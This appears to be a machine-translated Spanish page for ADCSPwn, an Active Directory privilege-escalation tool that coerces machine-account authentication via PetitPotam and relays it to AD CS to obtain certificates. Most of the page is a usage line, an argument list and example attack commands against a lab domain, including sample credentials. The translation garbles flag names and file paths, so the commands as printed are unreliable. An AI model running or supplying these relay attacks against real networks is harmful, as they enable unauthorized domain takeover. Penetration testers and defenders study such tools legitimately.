ADCSPwn es una herramienta para escalar permisos en una red de Active Directory forzando la autenticación de cuentas de computadora (Petitpotam) y enviándola al servicio de certificados.
Uso
Correr ADCSPwn
en su red de destino.
Autor: @batsec – MDsec ActiveBreach
Colaborador: @Flangvik – TrustedSec
adcspwn.exe –adcs –port [local port] -Control remoto [computer]
Argumentos requeridos:
adcs: esta es la dirección del servidor AD CS al que se reenviará la autenticación.
Argumentos opcionales:
puerto: el puerto en el que está escuchando ADCSPwn.
remoto: equipo remoto desde el que se activará la autenticación.
username: nombre de usuario para contexto que no es de dominio.
contraseña: contraseña para contexto que no es de dominio.
dc: controlador de dominio para consultar plantillas de certificado (LDAP).
unc: establece la ruta de devolución de llamada UNC definida por el usuario para EfsRpcOpenFileRaw (Petitpotam).
salida: ruta de salida para guardar el crt generado en base64.
Ejemplo de aplicación:
adcspwn.exe –adcs cs.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –Port 9001
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local –Port 9001
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –salida C: Temp cert_b64.txt
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local –Nombre de usuario pwnlab.local mranderson –Password The0nly0ne! –Dc dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –dc dc.pwnlab.local –unc WIN-WORK01.pwnlab.local made up share